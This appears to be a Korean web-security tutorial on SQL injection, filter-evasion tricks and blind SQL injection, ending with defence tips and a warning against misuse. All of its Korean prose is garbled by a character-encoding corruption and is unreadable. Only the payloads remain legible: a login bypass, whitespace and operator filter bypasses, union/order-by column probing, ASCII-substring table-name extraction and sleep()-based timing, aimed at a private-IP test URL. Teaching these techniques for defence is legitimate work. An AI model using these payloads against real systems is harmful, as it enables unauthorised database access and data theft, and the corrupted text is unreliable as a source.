[WEB Ãë¾àÁ¡ SQL Injection] ÇÊÅ͸µ ¿ìȸ + Blind SQL Injection
SQL INJECTION
[Á¤ÀÇ]
SQL ÀÎÁ§¼Ç (SQL »ðÀÔ, SQL ÁÖÀÔÀ¸·Îµµ ºÒ¸°´Ù) Àº ÄÚµå ÀÎÁ§¼ÇÀÇ ÇÑ ±â¹ýÀ¸·Î Ŭ¶óÀ̾ðÆ®ÀÇ ÀԷ°ªÀ» Á¶ÀÛÇÏ¿© ¼¹öÀÇ µ¥ÀÌÅͺ£À̽º¸¦ °ø°ÝÇÒ ¼ö ÀÖ´Â °ø°Ý¹æ½ÄÀ» ¸»ÇÑ´Ù. ÁÖ·Î »ç¿ëÀÚ°¡ ÀÔ·ÂÇÑ µ¥ÀÌÅ͸¦ Á¦´ë·Î ÇÊÅ͸µ, À̽ºÄÉÀÌÇÎÇÏÁö ¸øÇßÀ» °æ¿ì¿¡ ¹ß»ýÇÑ´Ù. °ø°ÝÀÌ ½¬¿îµ¥ ºñÇØ Æı«·ÂÀÌ ¾î¸¶¾î¸¶ Çϱ⠶§¹®¿¡ ½ÃÅ¥¾îÄÚµùÀ» ÇÏ´Â °³¹ßÀÚ¶ó¸é °¡Àå ¸ÕÀú ¹è¿ì°Ô µÇ´Â ³»¿ëÀÌ´Ù. ÀÌ·¯ÇÑ injection °è¿ÀÇ Ãë¾àÁ¡µéÀº Å×½ºÆ®¸¦ ÅëÇØ ¹ß°ßÇϱâ´Â ÈûµéÁö¸¸ ½ºÄ³´×ÅøÀ̳ª ÄÚµå °ËÁõÀýÂ÷¸¦ °ÅÄ¡¸é º¸Åë ½±°Ô ¹ß°ßµÇ±â ¶§¹®¿¡ ŽÁöÇϱâ´Â ½¬¿î ÆíÀÌ´Ù.
reference : ³ª¹«À§Å°
[Á¾·ù]
- sql injection
- blind sql injection
- union injection ; blind sql injection ¿¡ °°ÀÌ ¾²ÀÓ
[¿¹Á¦]
# ÀϹÝÀûÀÎ sql injection
- query Ư¼ºÀ» ÀÌ¿ëÇÏ¿© ÂüÀÌ µÇ°Ô ¸¸µç´Ù.
Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password="" or "1=1";
ID | admin |
PW | " or "1=1 |
[ÇÊÅ͸µ ¿ìȸ ¿¹Á¦]
# °ø¹éÀÌ ÇÊÅ͸µ µÆÀ» ¶§
- %0a, /**/, %09, () ( URL¿¡¼´Â %20 )
Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password=""%0aor%0a"1=1";
ID | admin |
PW | "%0aor%0a"1=1 |
# =, and, or ÇÊÅ͸µ µÆÀ» ¶§
- °¢°¢ like, &&, ||
Á¤»óÀû sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Á¶ÀÛÇÑ sql query : SELECT * from tables where id="admin" and password="" || "1 like 1";
ID | admin |
PW | " || "1 like 1 |
BLIND SQL INJECTION
[Á¤ÀÇ]
º¸ÀÌÁö ¾Ê´Â(blind) sql injection. ¿¡·¯ ±â¹ÝÀÇ sql injectionÀ» ¸·¾ÒÀ»¶§ DBÁ¤º¸°¡ ¸ðµÎ ºí¶óÀεå ó¸® µÇ±â ¶§¹®¿¡ Äõ¸®¸¦ ÀÔ·ÂÇÏ¿© ¼¹ö¿¡¼ ¾òÀ» ¼ö ÀÖ´Â °ÍÀº Âü°ú °ÅÁþ »ÓÀÌ´Ù. ÀÌ Âü°ú °ÅÁþÀ» ÀÌ¿ëÇÏ¿© DB ³»ºÎÀÇ Á¤º¸¸¦ ¾Ë¾Æ³»´Â °ø°Ý ±â¹ý
[¿¹Á¦]
# Ä÷³ÀÇ °¹¼ö¸¦ ¾Ë°í ½ÍÀ» ¶§
sql query : select * from news where no=1 order by 1;
URL | http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 |
# Å×À̺í À̸§À» ¾Ë°í ½ÍÀ» ¶§
- ¾Æ½ºÅ°Äڵ带 ÀÌ¿ëÇؼ ÇѱÛÀÚ¾¿ Âü°ú °ÅÁþÀ» ÀÌ¿ëÇؼ ¾Ë¾Æ³½´Ù.
sql query : select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;
URL | http://100.100.100.129/view.php?no=1 union select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67; |
# Âü°ú °ÅÁþ °á°ú¸¦ ¾Ë ¼ö ¾øÀ» ¶§
- and ¿Í sleep ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© ÇÔ¼ö°¡ ÀÛµ¿Çϸé Äõ¸®°¡ ÀÛµ¿ÇÑ °ÍÀ¸·Î °£ÁÖÇÑ´Ù.
sql query : select * from news where no=1 order by 1;
URL | http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 and sleep(10) |
SQL INJECTION ¹æ¾î ¹æ¹ý
- sql query ¿¡ »ç¿ëµÇ´Â ¹®ÀÚ ¹× ´Ü¾îµéÀ» ÀüºÎ ÇÊÅ͸µ ÇÑ´Ù.
- ¿¡·¯ ¸Þ¼¼Áö, ƯÈ÷ query ¹®±¸°¡ ³ª¿ÀÁö ¾Êµµ·Ï °¢º°È÷ ÁÖÀÇ ÇÑ´Ù.
- ÃÖ¼Ò ±ÇÇÑ À¯Àú·Î DB¸¦ ¿î¿µ ÇÑ´Ù.
- ½Å·ÚÇÒ ¼ö ÀÖ´Â ³×Æ®¿öÅ©, ¼¹ö¿¡ ´ëÇؼ¸¸ Á¢±Ù Çã¿ëÇÑ´Ù.
¡Ø ¿¬½À ȯ°æÀÌ Á¦°øµÈ ÀϺΠ»çÀÌÆ®¸¦ Á¦¿ÜÇÑ ÀÏ¹Ý »çÀÌÆ®¿¡ Àû¿ë ¹× ¾Ç¿ë Àý´ë ±ÝÁö!
¡Ø ¹«ºÐº°ÇÑ Àû¿ë ¹× ¾Ç¿ëÀ¸·Î ÀÎÇÑ ÇÇÇØ´Â Àý´ë·Î Ã¥ÀÓÁöÁö ¾Ê½À´Ï´Ù.